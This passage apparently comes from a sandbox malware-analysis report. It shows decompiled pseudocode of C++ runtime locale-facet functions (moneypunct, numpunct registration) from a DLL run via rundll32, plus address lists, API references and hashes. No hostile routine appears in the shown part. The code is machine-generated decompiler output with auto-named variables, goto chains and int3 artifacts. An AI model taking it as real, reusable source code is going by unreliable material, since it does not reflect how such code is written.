																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6e2c6db0 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6E206FD3(__eflags, _t516);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6e2c6dd8 = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6E206FD3(__eflags, _t515);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6e2c6dc4 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6E206FD3(__eflags, _t514);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6e2c6dc8 = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6E206FD3(__eflags, _t513);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6e2c6df4 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6E206FD3(__eflags, _t512);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6e2c6df8 = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}










































                          0x6e20f567
                          0x6e20f567
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f598
                          0x6e20f59d
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F56E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F578
                          • int.LIBCPMT ref: 6E20F58F
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F5B2
                          • std::_Facet_Register.LIBCPMT ref: 6E20F5C9
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F5E9
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F607
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: 0d964810bfd792dfd90f7f1dbdabeb84099d0821db2dab1f33aed50f754c40d3
                          • Instruction ID: 4430a788135ba6fe5c0d3a1d7bd1b584371bfa209c41759e8d9901a041af72ae
                          • Opcode Fuzzy Hash: 0d964810bfd792dfd90f7f1dbdabeb84099d0821db2dab1f33aed50f754c40d3
                          • Instruction Fuzzy Hash: 4E11067991051E8FCF05DFE4C894AEEB77BBF94718F240918E4216B2D0DB749A84C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A2F1, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 70%
                          			E6E20A2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t52 =  *0x6e2c6cd4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6E1E161C(0x6e2c6cc0);
				_t40 = _a8;
				_t22 = E6E1E171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20AB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6E1E1438(_t44);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6e26ba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6E206FD3(__eflags, _t50);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6e2c6cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}












                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a322
                          0x6e20a327
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A2F8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A302
                          • int.LIBCPMT ref: 6E20A319
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • numpunct.LIBCPMT ref: 6E20A33C
                          • std::_Facet_Register.LIBCPMT ref: 6E20A353
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A373
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A391
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                          • String ID:
                          • API String ID: 2509942033-0
                          • Opcode ID: 4874b7eead0ef606ae9065d7341ae4be5de678551fec6b4eda4d2aeb5f8608c6
                          • Instruction ID: 7e277367ff80e61130ca7e8184fd0f73f595a43bfe6d12f322f8be67388d697a
                          • Opcode Fuzzy Hash: 4874b7eead0ef606ae9065d7341ae4be5de678551fec6b4eda4d2aeb5f8608c6
                          • Instruction Fuzzy Hash: 2A1106B591052D8FCF04DBE0C898AEDB77BAF45714F540908E5106B2D0DF74AA44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A059, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20A059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				void* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t103;
				void* _t116;
				void* _t129;
				intOrPtr* _t196;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				void* _t224;

				_t212 = __edx;
				_t161 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t220 =  *0x6e2c6cd8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t220;
				_t77 = E6E1E161C(0x6e2c6cc4);
				_t164 = _a8;
				_t78 = E6E1E171B(_a8, _t77);
				_t214 = _t78;
				if(_t78 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t214);
				} else {
					if(_t220 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20A96A(__ebx, _t164, __edx, _t214, _t220) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t214, _t220, 0x14);
							E6E206653( &_v20, 0);
							_t221 =  *0x6e2c6cc8; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t221;
							_t90 = E6E1E161C(0x6e2c6b38);
							_t171 = _a8;
							_t215 = E6E1E171B(_a8, _t90);
							__eflags = _t215;
							if(_t215 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t215);
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20A9D2(_t161, _t171, __edx, _t215, _t221) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t161, _t215, _t221, 0x14);
										E6E206653( &_v20, 0);
										_t222 =  *0x6e2c6ccc; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t222;
										_t103 = E6E1E161C(0x6e2c6cb8);
										_t178 = _a8;
										_t216 = E6E1E171B(_a8, _t103);
										__eflags = _t216;
										if(_t216 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t216);
										} else {
											__eflags = _t222;
											if(_t222 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AA38(_t161, _t178, __edx, _t216, _t222) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438( &_v32);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t161, _t216, _t222, 0x14);
													E6E206653( &_v20, 0);
													_t223 =  *0x6e2c6cd0; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t223;
													_t116 = E6E1E161C(0x6e2c6cbc);
													_t185 = _a8;
													_t217 = E6E1E171B(_a8, _t116);
													__eflags = _t217;
													if(_t217 != 0) {
														L26:
														E6E2066BA( &_v20);
														return E6E220075(_t217);
													} else {
														__eflags = _t223;
														if(_t223 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E20AAA0(_t161, _t185, _t212, _t217, _t223) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438( &_v32);
																E6E223D74( &_v32, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t161, _t217, _t223, 0x14);
																E6E206653( &_v20, 0);
																_t224 =  *0x6e2c6cd4; // 0x0
																_v4 = _v4 & 0x00000000;
																_v16 = _t224;
																_t129 = E6E1E161C(0x6e2c6cc0);
																_t192 = _a8;
																_t218 = E6E1E171B(_a8, _t129);
																__eflags = _t218;
																if(_t218 != 0) {
																	L33:
																	E6E2066BA( &_v20);
																	return E6E220075(_t218);
																} else {
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_push(_a8);
																		_push( &_v16);
																		__eflags = E6E20AB08(_t161, _t192, _t212, _t218, _t224) - 0xffffffff;
																		if(__eflags == 0) {
																			_t196 =  &_v32;
																			E6E1E1438(_t196);
																			E6E223D74( &_v32, 0x6e2c3504);
																			asm("int3");
																			_push(_t196);
																			 *((intOrPtr*)(_t196 + 4)) = _v12;
																			_v28 = _t196;
																			 *_t196 = 0x6e26ba24;
																			return _t196;
																		} else {
																			_t218 = _v16;
																			_v16 = _t218;
																			_v4 = 1;
																			E6E206FD3(__eflags, _t218);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 4))))();
																			 *0x6e2c6cd4 = _t218;
																			goto L33;
																		}
																	} else {
																		_t218 = _t224;
																		goto L33;
																	}
																}
															} else {
																_t217 = _v16;
																_v16 = _t217;
																_v4 = 1;
																E6E206FD3(__eflags, _t217);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4))))();
																 *0x6e2c6cd0 = _t217;
																goto L26;
															}
														} else {
															_t217 = _t223;
															goto L26;
														}
													}
												} else {
													_t216 = _v16;
													_v16 = _t216;
													_v4 = 1;
													E6E206FD3(__eflags, _t216);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t216 + 4))))();
													 *0x6e2c6ccc = _t216;
													goto L19;
												}
											} else {
												_t216 = _t222;
												goto L19;
											}
										}
									} else {
										_t215 = _v16;
										_v16 = _t215;
										_v4 = 1;
										E6E206FD3(__eflags, _t215);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t215 + 4))))();
										 *0x6e2c6cc8 = _t215;
										goto L12;
									}
								} else {
									_t215 = _t221;
									goto L12;
								}
							}
						} else {
							_t214 = _v16;
							_v16 = _t214;
							_v4 = 1;
							E6E206FD3(__eflags, _t214);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t214 + 4))))();
							 *0x6e2c6cd8 = _t214;
							goto L5;
						}
					} else {
						_t214 = _t220;
						goto L5;
					}
				}
			}

























                          0x6e20a059
                          0x6e20a059
                          0x6e20a060
                          0x6e20a06a
                          0x6e20a06f
                          0x6e20a07a
                          0x6e20a07e
                          0x6e20a081
                          0x6e20a086
                          0x6e20a08a
                          0x6e20a08f
                          0x6e20a093
                          0x6e20a0d8
                          0x6e20a0db
                          0x6e20a0e7
                          0x6e20a095
                          0x6e20a097
                          0x6e20a09d
                          0x6e20a0a3
                          0x6e20a0ab
                          0x6e20a0ae
                          0x6e20a0eb
                          0x6e20a0f9
                          0x6e20a0fe
                          0x6e20a106
                          0x6e20a110
                          0x6e20a115
                          0x6e20a120
                          0x6e20a124
                          0x6e20a127
                          0x6e20a12c
                          0x6e20a135
                          0x6e20a137
                          0x6e20a139
                          0x6e20a17e
                          0x6e20a181
                          0x6e20a18d
                          0x6e20a13b
                          0x6e20a13b
                          0x6e20a13d
                          0x6e20a143
                          0x6e20a149
                          0x6e20a151
                          0x6e20a154
                          0x6e20a191
                          0x6e20a19f
                          0x6e20a1a4
                          0x6e20a1ac
                          0x6e20a1b6
                          0x6e20a1bb
                          0x6e20a1c6
                          0x6e20a1ca
                          0x6e20a1cd
                          0x6e20a1d2
                          0x6e20a1db
                          0x6e20a1dd
                          0x6e20a1df
                          0x6e20a224
                          0x6e20a227
                          0x6e20a233
                          0x6e20a1e1
                          0x6e20a1e1
                          0x6e20a1e3
                          0x6e20a1e9
                          0x6e20a1ef
                          0x6e20a1f7
                          0x6e20a1fa
                          0x6e20a237
                          0x6e20a245
                          0x6e20a24a
                          0x6e20a252
                          0x6e20a25c
                          0x6e20a261
                          0x6e20a26c
                          0x6e20a270
                          0x6e20a273
                          0x6e20a278
                          0x6e20a281
                          0x6e20a283
                          0x6e20a285
                          0x6e20a2ca
                          0x6e20a2cd
                          0x6e20a2d9
                          0x6e20a287
                          0x6e20a287
                          0x6e20a289
                          0x6e20a28f
                          0x6e20a295
                          0x6e20a29d
                          0x6e20a2a0
                          0x6e20a2dd
                          0x6e20a2eb
                          0x6e20a2f0
                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a327
                          0x6e20a329
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f
                          0x6e20a2a2
                          0x6e20a2a2
                          0x6e20a2a5
                          0x6e20a2a9
                          0x6e20a2ad
                          0x6e20a2ba
                          0x6e20a2c2
                          0x6e20a2c4
                          0x00000000
                          0x6e20a2c4
                          0x6e20a28b
                          0x6e20a28b
                          0x00000000
                          0x6e20a28b
                          0x6e20a289
                          0x6e20a1fc
                          0x6e20a1fc
                          0x6e20a1ff
                          0x6e20a203
                          0x6e20a207
                          0x6e20a214
                          0x6e20a21c
                          0x6e20a21e
                          0x00000000
                          0x6e20a21e
                          0x6e20a1e5
                          0x6e20a1e5
                          0x00000000
                          0x6e20a1e5
                          0x6e20a1e3
                          0x6e20a156
                          0x6e20a156
                          0x6e20a159
                          0x6e20a15d
                          0x6e20a161
                          0x6e20a16e
                          0x6e20a176
                          0x6e20a178
                          0x00000000
                          0x6e20a178
                          0x6e20a13f
                          0x6e20a13f
                          0x00000000
                          0x6e20a13f
                          0x6e20a13d
                          0x6e20a0b0
                          0x6e20a0b0
                          0x6e20a0b3
                          0x6e20a0b7
                          0x6e20a0bb
                          0x6e20a0c8
                          0x6e20a0d0
                          0x6e20a0d2
                          0x00000000
                          0x6e20a0d2
                          0x6e20a099
                          0x6e20a099
                          0x00000000
